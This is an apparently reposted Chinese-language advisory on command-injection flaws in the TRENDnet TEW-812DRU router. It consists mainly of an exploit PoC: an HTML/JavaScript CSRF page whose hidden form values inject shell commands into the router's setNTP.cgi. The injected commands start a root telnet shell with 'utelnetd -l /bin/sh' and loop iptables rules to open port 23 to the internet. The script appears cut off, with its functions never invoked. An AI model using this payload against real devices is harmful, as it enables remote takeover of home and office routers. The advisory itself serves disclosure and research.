812DRU多个命令注入漏洞(CVE

日期：2020-06-06 栏目：程序人生浏览：次

发布日期：2013-07-28
更新日期：2013-07-31

受影响系统：
trendnet TEW-812DRU
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 61492
CVE(CAN) ID: CVE-2013-3365

Trendnet TEW-812DRU是双宽带无线路由器。

TRENDnet TEW-812DRU允许攻击者在受影响设备上下文中执行任意命令。

<*来源：Jacob Holcomb
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

TRENDnet TEW-812DRU CSRF/Command Injection Root Exploit

EDB-ID: 27177 CVE: 2013-3098 OSVDB-ID: N/A
Author: Jacob Holcomb Published: 2013-07-28 Verified: Not Verified
Exploit Code: Download Vulnerable App: N/A
Rating
Overall:
<html>
<head>
<title> TRENDnet TEW-812DRU CSRF - Command Injection > Shell Exploit.</title>

</head>
<body>
<img src="https://192.168.10.1/Images/logo.gif">
<h1>Please wait... </h1>
<script type="text/javascript">
//Request to enable port forwarding to the routers internal IP on port 23
//This exploit works without this request, but the exploit was more stable with it, so its included in thos PoC.
function RF1(){
document.write('<form target ="_blank" action="http://192.168.10.1/uapply.cgi" method="post">'+
'<input type="hidden" value="/advanced/single_port.asp">'+
'<input type="hidden" value="0">'+
'<input type="hidden" value="24">'+
'<input type="hidden" value="tcp">'+
'<input type="hidden" value="23">'+
'<input type="hidden" value="23">'+
'<input type="hidden" value="192.168.10.1">'+
'<input type="hidden" value="23">'+
'<input type="hidden" value="23">'+
'<input type="hidden" value="0">'+
'<input type="hidden" value="on">'+
'<input tpye="hidden" value="Apply">'+
'</form>');
}

//Request to enable telnet
function RF2(){
document.write('<form target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
'<input type="hidden" value="/adm/time.asp">'+
'<input type="hidden" value="on">'+
'<input type="hidden" value="1">'+
'<input type="hidden" value="`utelnetd -l /bin/sh`">'+
'<input type="hidden" value="030102">'+
'<input type="hidden" value="03">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="02">'+
'<input type="hidden" value="100102">'+
'<input type="hidden" value="10">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="02">'+
'<input type="hidden" value="1">'+
'<input type="hidden" value="pool.ntp.org">'+
'<input type="hidden" value="UCT_-11">'+
'<input type="hidden" value="300">'+
'<input type="hidden" value="2012">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="00">'+
'<input type="hidden" value="19">'+
'<input type="hidden" value="57">'+
'<input type="hidden" value="manual">'+
'</form>');
}

//Request to change iptables to allow port 23 from the WAN.
function RF3(){
document.write(
'<form target="_blank" action="http://192.168.10.1/setNTP.cgi" method="post">'+
'<input type="hidden" value="/adm/time.asp">'+
'<input type="hidden" value="on">'+
'<input type="hidden" value="1">'+
'<input type="hidden" value="3600">'+
'<input type="hidden" value="030102">'+
'<input type="hidden" value="03">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="02">'+
'<input type="hidden" value="`count=0;while [ $count -le 25 ]; do iptables -I INPUT 1 -p tcp --dport 23 -j ACCEPT;(( count++ ));done;`">'+
'<input type="hidden" value="10">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="02">'+
'<input type="hidden" value="1">'+
'<input type="hidden" value="pool.ntp.org">'+
'<input type="hidden" value="UCT_-11">'+
'<input type="hidden" value="300">'+
'<input type="hidden" value="2012">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="01">'+
'<input type="hidden" value="00">'+
'<input type="hidden" value="19">'+
'<input type="hidden" value="57">'+
'<input type="hidden" value="manual">'+
'</form>');
}

转载注明出处：http://www.heiqu.com/pfxpp.html

812DRU多个命令注入漏洞(CVE

相关推荐